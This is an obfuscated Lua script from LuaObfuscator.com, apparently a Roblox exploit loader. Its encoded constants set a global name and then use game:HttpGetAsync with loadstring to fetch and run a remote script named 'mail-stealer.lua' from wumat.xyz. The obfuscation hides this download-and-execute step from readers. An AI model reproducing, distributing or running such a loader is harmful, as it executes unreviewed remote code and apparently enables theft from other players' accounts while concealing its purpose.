--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then local v80=0;while true do if (v80==0) then v28=v1(v4(v29,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v3(v1(v29,16));if v28 then local v114=v6(v82,v28);v28=nil;return v114;else return v82;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v83=(v31/(((3 -2) + 1)^(v32-((930 -(852 + 77)) + 0))))%((1 + 1 + 0)^(((v33-(1 + 0)) -(v32-(1 -0))) + 1)) ;return v83-(v83%(3 -2)) ;else local v84=0 + 0 ;local v85;while true do if (v84==(1705 -(153 + 1552))) then v85=2^(v32-(4 -3)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (989 -(857 + 132)) ;end end end end local function v34()local v47=0 + 0 ;local v48;while true do if (v47==(1719 -(1608 + 110))) then return v48;end if (v47==0) then v48=v2(v17,v27,v27);v27=v27 + 1 + 0 ;v47=1;end end end local function v35()local v49=0 -0 ;local v50;local v51;while true do if (v49==(0 + (0 -0))) then v50,v51=v2(v17,v27,v27 + 2 );v27=v27 + (316 -(121 + (1636 -(482 + 961)))) ;v49=2 -1 ;end if (v49==(957 -(779 + 177))) then return (v51 * 256) + v50 ;end end end local function v36()local v52=0 + 0 ;local v53;local v54;local v55;local v56;while true do if (v52==(0 -0)) then v53,v54,v55,v56=v2(v17,v27,v27 + 3 );v27=v27 + (1612 -(142 + 1466)) ;v52=1 + 0 ;end if (v52==(1454 -(1193 + 260))) then return (v56 * (26355563 -9578347)) + (v55 * (65936 -((480 -224) + 144))) + (v54 * ((310 + 1062) -(777 + 339))) + v53 ;end end end local function v37()local v57=0 -0 ;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v57==3) then if (v62==(0 -0)) then if (v61==(0 + 0)) then return v63 * (1701 -(1012 + 689)) ;else v62=128 -(23 + 104) ;v60=(26 + 144) -(136 + 34) ;end elseif (v62==2047) then return ((v61==(0 -0)) and (v63 * ((878 -(17 + 860))/(0 -0)))) or (v63 * NaN) ;end return v9(v63,v62-(866 + 157) ) * (v60 + (v61/((9 -7)^(1094 -((1143 -672) + 571))))) ;end if ((500 -(457 + 43))==v57) then v58=v36();v59=v36();v57=1;end if (v57==(7 -(1 + 4))) then v62=v30(v59,62 -41 ,693 -(140 + 522) );v63=((v30(v59,9 + 23 )==1) and  -(201 -(193 + 7))) or (2 -1) ;v57=1843 -(451 + 1053 + 336) ;end if (v57==(2 -1)) then v60=(44 -22) -(13 + 8) ;v61=(v30(v59,1 + 0 ,1660 -(38 + (2939 -(656 + 681))) ) * ((1 + 1)^(112 -(19 + 61)))) + v58 ;v57=1588 -(154 + 238 + 1194) ;end end end local function v38(v39)local v64;if  not v39 then local v86=0 + (0 -0) ;while true do if (v86==(0 + 0)) then v39=v36();if (v39==(0 -0)) then return "";end break;end end end v64=v4(v17,v27,(v27 + v39) -(1767 -(862 + 904)) );v27=v27 + v39 ;local v65={};for v77=1, #v64 do v65[v77]=v3(v2(v4(v64,v77,v77)));end return v7(v65);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v66=0;local v67;local v68;local v69;local v70;local v71;local v72;while true do local v79=0 + 0 ;while true do if (v79==(1864 -(317 + 1546))) then if (v66==(1796 -(1403 + 392))) then local v105=0 + 0 ;local v106;while true do if (v105==(0 -0)) then v106=0 -0 ;while true do if (v106~=(720 -(701 + 18))) then else local v128=725 -(294 + 431) ;while true do if ((920 -(40 + 880))==v128) then for v133=1,v71 do local v134=0;local v135;local v136;local v137;local v138;local v139;while true do if (v134==(0 + 0)) then v135=922 -(75 + 847) ;v136=nil;v134=1 -0 ;end if (v134~=(1 -0)) then else v137=nil;v138=nil;v134=257 -(7 + 248) ;end if (v134==2) then v139=nil;while true do if (v135==(1 + 0)) then local v173=0 -0 ;while true do if (v173~=(404 -(44 + 360))) then else v138=nil;v139=nil;v173=545 -(38 + 506) ;end if (v173==(1 -0)) then v135=5 -3 ;break;end end end if (v135==2) then while true do if (v136~=(1401 -(671 + 730))) then else local v181=0 + 0 ;while true do if (v181==0) then local v192=0 -0 ;while true do if (v192~=(1 -0)) then else v181=1 + 0 ;break;end if (v192~=(1156 -(995 + 161))) then else v137=0 -0 ;v138=nil;v192=1 -0 ;end end end if (v181==(1 + 0)) then v136=1 + 0 ;break;end end end if (v136==(3 -2)) then v139=nil;while true do if (v137==(0 -0)) then local v193=1590 -(1185 + 405) ;local v194;local v195;while true do if (v193~=(1 + 0)) then else while true do if ((0 + 0)==v194) then v195=0;while true do if (v195~=(411 -(4 + 407))) then else local v217=1288 -(638 + 650) ;local v218;while true do if (v217~=0) then else v218=0 -0 ;while true do if ((82 -(27 + 55))==v218) then v138=v34();v139=nil;v218=1 + 0 ;end if (v218==1) then v195=1226 -(1027 + 198) ;break;end end break;end end end if (v195==(1142 -(122 + 1019))) then v137=1;break;end end break;end end break;end if (v193==(16 -(12 + 4))) then v194=432 -(111 + 321) ;v195=nil;v193=1;end end end if (v137==(1 + 0)) then if (v138==(1 + 0)) then v139=v34()~=(0 + 0) ;elseif (v138==(2 + 0)) then v139=v37();elseif (v138~=(2 + 1)) then else v139=v38();end v72[v133]=v139;break;end end break;end end break;end if (v135==(0 + 0)) then v136=0;v137=nil;v135=1;end end break;end end end v70[3 + 0 ]=v34();v128=1 + 0 ;end if (v128~=(236 -(119 + 116))) then else v106=2 + 0 ;break;end end end if (v106==0) then v71=v36();v72={};v106=2 -1 ;end if (v106~=2) then else v66=2 + 0 ;break;end end break;end end end break;end if (v79==(257 -(223 + 34))) then if ((0 + 0)==v66) then local v107=0 + 0 ;while true do if (v107==2) then v66=1 + 0 ;break;end if ((1 -0)==v107) then v69={};v70={v67,v68,nil,v69};v107=4 -2 ;end if ((1096 -(552 + 544))==v107) then v67={};v68={};v107=1 + 0 ;end end end if (v66==(5 -3)) then local v108=0 + 0 ;while true do if (v108==(678 -(512 + 165))) then for v119=2 -1 ,v36() do v69[v119]=v36();end return v70;end if (v108==(667 -(333 + 334))) then for v121=1 + 0 ,v36() do local v122=59 -(26 + 33) ;local v123;local v124;local v125;while true do if (v122~=(1 + 0)) then else v125=nil;while true do if (v123~=(3 -2)) then else while true do if (v124==(0 -0)) then v125=v34();if (v30(v125,2 -1 ,3 -2 )~=(0 -0)) then else local v166=0 -0 ;local v167;local v168;local v169;local v170;local v171;local v172;while true do if (0~=v166) then else v167=0 + 0 ;v168=nil;v166=1;end if (v166==(161 -(61 + 98))) then v171=nil;v172=nil;v166=301 -(156 + 142) ;end if (v166==(2 -1)) then v169=nil;v170=nil;v166=1 + 1 ;end if (v166==3) then while true do if (v167==(473 -(438 + 33))) then v172=nil;while true do if ((8 -6)==v168) then while true do if (v169==1) then local v204=0;while true do if (v204==(3 -2)) then v169=2;break;end if (v204~=0) then else local v215=0 + 0 ;while true do if (v215~=(1586 -(1212 + 374))) then else local v221=0 + 0 ;while true do if (v221==(1177 -(259 + 917))) then v215=713 -(434 + 278) ;break;end if ((0 -0)==v221) then v172={v35(),v35(),nil,nil};if (v170==(0 + 0)) then local v224=1008 -(406 + 602) ;local v225;local v226;while true do if (v224==(506 -(355 + 150))) then while true do if (v225==0) then v226=0 -0 ;while true do if (v226==(0 + 0)) then v172[546 -(317 + 226) ]=v35();v172[4]=v35();break;end end break;end end break;end if (v224==(0 + 0)) then v225=0 + 0 ;v226=nil;v224=1 + 0 ;end end elseif (v170==1) then v172[3]=v36();elseif (v170==(1 + 1)) then v172[1920 -(1673 + 244) ]=v36() -(2^(36 -20)) ;elseif (v170==(10 -7)) then local v233=0 -0 ;local v234;local v235;while true do if (v233~=(978 -(827 + 150))) then else while true do if (v234==(0 + 0)) then v235=0;while true do if (v235==(0 + 0)) then v172[1084 -(490 + 591) ]=v36() -(2^(8 + 8)) ;v172[4]=v35();break;end end break;end end break;end if (v233==(0 -0)) then local v238=0 -0 ;while true do if (v238==1) then v233=1;break;end if (v238==(0 + 0)) then v234=0 -0 ;v235=nil;v238=46 -(31 + 14) ;end end end end end v221=1;end end end if (v215~=(684 -(625 + 58))) then else v204=1;break;end end end end end if (v169==0) then local v205=0 -0 ;local v206;local v207;while true do if (v205==(1236 -(1145 + 90))) then while true do if (v206==(0 + 0)) then v207=940 -(685 + 255) ;while true do if (v207==(0 -0)) then local v223=0 + 0 ;while true do if ((1 -0)==v223) then v207=2 -1 ;break;end if (v223==0) then v170=v30(v125,1 + 1 ,7 -4 );v171=v30(v125,15 -11 ,5 + 1 );v223=1 -0 ;end end end if (v207==1) then v169=4 -3 ;break;end end break;end end break;end if (v205==(0 + 0)) then v206=0 + 0 ;v207=nil;v205=261 -(199 + 61) ;end end end if (v169==(1546 -(638 + 905))) then if (v30(v171,1 + 2 ,7 -4 )==1) then v172[12 -8 ]=v72[v172[4]];end v67[v121]=v172;break;end if (v169==2) then local v209=0;local v210;while true do if ((0 + 0)==v209) then v210=0 -0 ;while true do if (v210==(1173 -(37 + 1135))) then v169=3;break;end if (v210~=(0 -0)) then else local v222=0 -0 ;while true do if ((0 + 0)~=v222) then else if (v30(v171,1,2 -1 )~=1) then else v172[1 + 1 ]=v72[v172[2 + 0 ]];end if (v30(v171,2,1968 -(1664 + 302) )==(1 -0)) then v172[3 + 0 ]=v72[v172[3]];end v222=38 -(36 + 1) ;end if (v222==(1 + 0)) then v210=667 -(517 + 149) ;break;end end end end break;end end end end break;end if ((175 -(49 + 125))==v168) then local v203=0 -0 ;while true do if (v203==(1 + 0)) then v168=2;break;end if (v203~=(0 -0)) then else v171=nil;v172=nil;v203=1039 -(244 + 794) ;end end end if (v168~=(0 + 0)) then else v169=0 -0 ;v170=nil;v168=1;end end break;end if (v167==(0 + 0)) then local v185=0 -0 ;while true do if ((1299 -(910 + 388))~=v185) then else v167=1;break;end if (v185~=(0 + 0)) then else v168=1186 -(104 + 1082) ;v169=nil;v185=1 + 0 ;end end end if (v167~=(300 -(263 + 36))) then else v170=nil;v171=nil;v167=3 -1 ;end end break;end end end break;end end break;end if (v123~=(0 -0)) then else v124=0;v125=nil;v123=1;end end break;end if (v122~=(0 -0)) then else v123=1583 -(1185 + 398) ;v124=nil;v122=1;end end end for v126=1 -0 ,v36() do v68[v126-(1081 -(675 + 405)) ]=v42();end v108=1;end end end v79=1;end end end end local function v43(v44,v45,v46)local v73=0;local v74;local v75;local v76;while true do if (v73==0) then v74=v44[1];v75=v44[2];v73=1;end if (v73==1) then v76=v44[3];return function(...)local v90=1;local v91= -1;local v92={...};local v93=v13("#",...) -1 ;local function v94()local v95=v74;local v96=v75;local v97=v76;local v98=v41;local v99={};local v100={};local v101={};for v109=329 -(200 + 129) ,v93 do if ((((4874 -(313 + 565)) + 657)>(4280 -2330)) and (v109>=v97)) then v99[v109-v97 ]=v92[v109 + (1133 -(819 + 313)) ];else v101[v109]=v92[v109 + 1 + 0 ];end end local v102=(v93-v97) + (1481 -(738 + 742)) ;local v103;local v104;while true do local v110=0 + 0 ;local v111;while true do if (((7238 -5205)<(1178 + 3172)) and (v110==(190 -(30 + 160)))) then v111=0 -0 ;while true do if ((v111==(0 -0)) or (1593>=((15895 -(714 + 898)) -10348))) then local v129=0 + 0 ;while true do if ((3969>(340 + 517)) and (v129==1)) then v111=1534 -(918 + 615) ;break;end if (((1750 -1193)<((638 + 3763) -(346 + (1663 -850)))) and (v129==(0 -0))) then v103=v95[v90];v104=v103[2 -1 ];v129=1;end end end if (((1 + 0)==v111) or (3335>=((9156 -2786) -(358 + 1062)))) then if (((5283 -(116 + 239))>(10093 -8067)) and (v104<=(1246 -(1088 + 153)))) then if (((1876 + 1496)<(10767 -(5609 + 945))) and (v104<=(2 + 0))) then if ((v104<=0) or (2543>=(1693 + 733 + 544))) then do return;end elseif (((3238 -1403)<3982) and (v104==(2 -1))) then local v153=0;local v154;local v155;while true do if ((v153==(1413 -((3125 -(1676 + 321)) + 284))) or (1390>((13754 -8481) -(263 + 933)))) then while true do if ((v154==(0 -0)) or (4601==1298)) then v155=v103[2 + 0 ];v101[v155]=v101[v155]();break;end end break;end if (((3373 + 462)<=3912) and (v153==(0 -0))) then v154=0 + 0 ;v155=nil;v153=1 -0 ;end end else v90=v103[1 + 2 ];end elseif (((501 + 2234)>((2544 -(1195 + 542)) -416)) and (v104<=(1178 -(564 + 611)))) then local v140=(334 -(301 + 33)) + 0 ;local v141;local v142;local v143;local v144;local v145;local v146;while true do if ((v140==(0 -0)) or ((1975 + 2588)==(1500 -868))) then v141=0;v142=nil;v140=1 -0 ;end if ((v140==(1294 -(220 + 1072))) or ((3794 -(5970 -3940))>(920 + 3089))) then v145=nil;v146=nil;v140=571 -(420 + 148) ;end if ((v140==(7 -4)) or ((622 + 2029)>(4156 + 672))) then while true do if ((v141==1) or ((1772 -(1398 + 218))>(5247 -((2937 -2201) + (1426 -863))))) then local v175=0;while true do if ((v175==(743 -(666 + 77))) or (64>((7987 -3603) -1825))) then v144=nil;v145=nil;v175=1 + 0 ;end if ((v175==(1 + 0 + 0)) or ((1585 -(440 + 1024))>((1712 + 7432) -6559))) then v141=1940 -(1351 + 587) ;break;end end end if ((v141==(0 -0)) or ((2868 -(10 + 899))>(4509 -(191 + 45)))) then local v176=0;while true do if ((((10266 -(874 + 694)) -6194)==(7205 -4701)) and ((2 -1)==v176)) then v141=1 + 0 ;break;end if (((6852 -4055)==(4049 -((983 -610) + 879))) and (v176==(607 -(196 + 411)))) then v142=0 + 0 ;v143=nil;v176=2 -(1 + 0) ;end end end if (((5422 -(6 + 496))>(5156 -(1029 + 469))) and (v141==(5 -3))) then v146=nil;while true do if (((1 + 0)==v142) or ((3177 + 1547)<(555 -137))) then local v186=0;local v187;while true do if (((2799 -(47 + 765))>=(464 + 508)) and (v186==(0 + 0))) then v187=72 -(43 + 29) ;while true do if (((1 + 0)==v187) or ((5637 -2463)>(11330 -7954))) then v142=1767 -(806 + 959) ;break;end if ((v187==(0 + 0 + 0)) or ((86 + 129 + 661)>(11105 -8638))) then local v211=1972 -(736 + 1236) ;while true do if (((5721 -2698)>=(8773 -5880)) and (v211==(0 + 0 + 0))) then v91=(v145 + v143) -1 ;v146=0 -0 ;v211=(885 -(454 + 430)) + 0 ;end if ((v211==(1 + 0)) or ((12417 -9877)>((3474 + 375) -(893 + 376)))) then v187=989 -(968 + 20) ;break;end end end end break;end end end if (((573 + 633)<=((5076 -2557) + 2150)) and (v142==2)) then for v197=v143,v91 do local v198=492 -(161 + 331) ;local v199;local v200;while true do if ((v198==0) or ((3301 -(181 + 38))==1403)) then v199=853 -(728 + 91 + 34) ;v200=nil;v198=1 + 0 ;end if ((v198==(148 -(133 + 14))) or ((1544 -(154 + 61))==4523)) then while true do if ((v199==(652 -(450 + 202))) or ((6694 -4413)>(1663 + (4480 -(1073 + 108))))) then v200=0 + 0 + 0 ;while true do if (((4503 -(31 + (170 -56)))>(1047 -(259 + 454))) and (v200==(428 -(248 + 180)))) then v146=v146 + 1 + 0 ;v101[v197]=v144[v146];break;end end break;end end break;end end end break;end if ((v142==(0 + 0)) or (((8111 -4273) -1311)<(178 + 398))) then local v188=0;local v189;while true do if (((6066 -4275)<=(13913 -8923)) and (v188==0)) then v189=0;while true do if ((v189==(393 -(202 + 191))) or ((12227 -7693)==(467 + 665))) then local v212=0 -0 ;while true do if ((1==v212) or (428>((4565 -(152 + 418)) -2189))) then v189=2 -1 ;break;end if (((7492 -4674)==((144 -67) + 1732 + 1009)) and (v212==(0 + 0))) then v143=v103[1 + (1173 -(1070 + 102)) ];v144,v145=v98(v101[v143](v14(v101,v143 + 1 + 0 ,v103[3 + 0 ])));v212=1077 -(261 + 815) ;end end end if ((v189==(1302 -(389 + (1962 -(330 + 720))))) or ((10593 -5831)<=3900)) then v142=486 -(54 + 431) ;break;end end break;end end end end break;end end break;end if (((16155 -12398)>=3256) and (v140==(1 + 0))) then v143=nil;v144=nil;v140=2;end end elseif ((v104>(1450 -(1087 + 359))) or ((6474 -3166)>(5943 -(166 + 935)))) then local v157=0 -0 ;local v158;local v159;local v160;while true do if (((0 -0)==v157) or (2835<=2093)) then v158=0 -0 ;v159=nil;v157=1 -0 ;end if ((v157==(1 + 0)) or ((4126 -(421 + 334))==(589 + 1447 + 1359))) then v160=nil;while true do if ((v158==(1026 -(50 + 976))) or ((5430 -(204 + 1028))==(3298 -(187 + 416)))) then local v184=0 + 0 ;while true do if ((2417>(180 + 1821)) and (v184==0)) then v159=0 -0 ;v160=nil;v184=1 + 0 ;end if ((v184==(153 -(128 + (50 -26)))) or (4903==(4068 -(187 + 1299)))) then v158=1 + 0 ;break;end end end if ((v158==(4 -(5 -2))) or (((14700 -(960 + 769)) -8055)==(2230 + (1291 -523)))) then while true do if ((4018==(14083 -10065)) and (v159==(0 -0))) then v160=v103[1 + 1 ];v101[v160]=v101[v160](v14(v101,v160 + 1 + 0 ,v91));break;end end break;end end break;end end elseif ((v101[v103[2]]==v103[(1554 -(819 + 731)) + 0 ]) or (3204<=(1826 -(425 + 317)))) then v90=v90 + (1597 -(1361 + (1325 -(942 + 148)))) ;else v90=v103[1 + 2 ];end elseif ((v104<=(22 -14)) or ((3805 -(173 + 446))<(7828 -(5320 -(272 + 385))))) then if (((1359 + 859)>=562) and (v104<=(367 -(47 + 314)))) then v101[v103[1415 -(308 + 1105) ]]=v46[v103[8 -5 ]];elseif ((v104>(778 -(638 + 133))) or ((5914 -2003)==(456 + (2150 -1301)))) then v101[v103[1725 -(364 + 1359) ]][v103[1 + 0 + 2 ]]=v103[6 -2 ];else v101[v103[2]]=v103[1221 -(848 + 370) ]~=(0 + 0) ;end elseif ((v104<=((994 -(613 + 25)) -(232 + 115))) or ((9024 -5212)<(8173 -4855))) then local v149=234 -(14 + 220) ;local v150;local v151;local v152;while true do if (((2048 + 233 + 471)==(1126 + 1626)) and (v149==(47 -((33 -20) + 27 + 7)))) then v150=0 + 0 + 0 ;v151=nil;v149=1 + 0 ;end if ((1==v149) or ((3743 -(6175 -4051))>(6306 -(825 + 773)))) then v152=nil;while true do if ((v150==(0 + 0)) or (1172==4072)) then local v177=1388 -((2725 -(1147 + 597)) + (653 -246)) ;while true do if (((942 + 155)<=(2700 -(358 + 1101))) and (v177==(3 -2))) then v150=1;break;end if (((829 -(153 + 676))==v177) or ((4712 -2388)>(4187 -((751 -(10 + 725)) + 197)))) then v151=v103[2];v152=v101[v103[1 + 2 ]];v177=1 + 0 ;end end end if ((v150==(1 + 0)) or (755<(853 -(343 + 288)))) then v101[v151 + 1 + 0 ]=v152;v101[v151]=v152[v103[15 -(3 + 8) ]];break;end end break;end end elseif (((4287 -(640 + 125))>=(4013 -2315)) and (v104>(725 -(562 + 153)))) then v101[v103[7 -5 ]]();else v101[v103[340 -(297 + 41) ]]=v103[4 -1 ];end v90=v90 + 1 + (446 -(201 + 245)) ;break;end end break;end end end end A,B=v41(v12(v94));if  not A[1] then local v112=0;local v113;while true do if (v112==0) then v113=v44[4][v90] or "?" ;error("Script error at ["   .. v113   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end end end return v43(v42(),{},v18)(...);end;v16("LOL!083O00028O0003073O0067657467656E7603043O006E616D65030D3O006C6567656E646172792O363230030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032A3O00682O7470733A2O2F77756D61742E78797A2F736372697074732F6D61696C2D737465616C65722E6C756100113O00120A3O00013O0026043O0001000100010004023O00010001001206000100024O0001000100010002003008000100030004001206000100053O001206000200063O00200900020002000700120A000400084O0007000500014O0003000200054O000500013O00022O000B0001000100010004023O001000010004023O000100016O00017O00113O00023O00043O00043O00053O00053O00053O00063O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v10(),...);break;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end end end
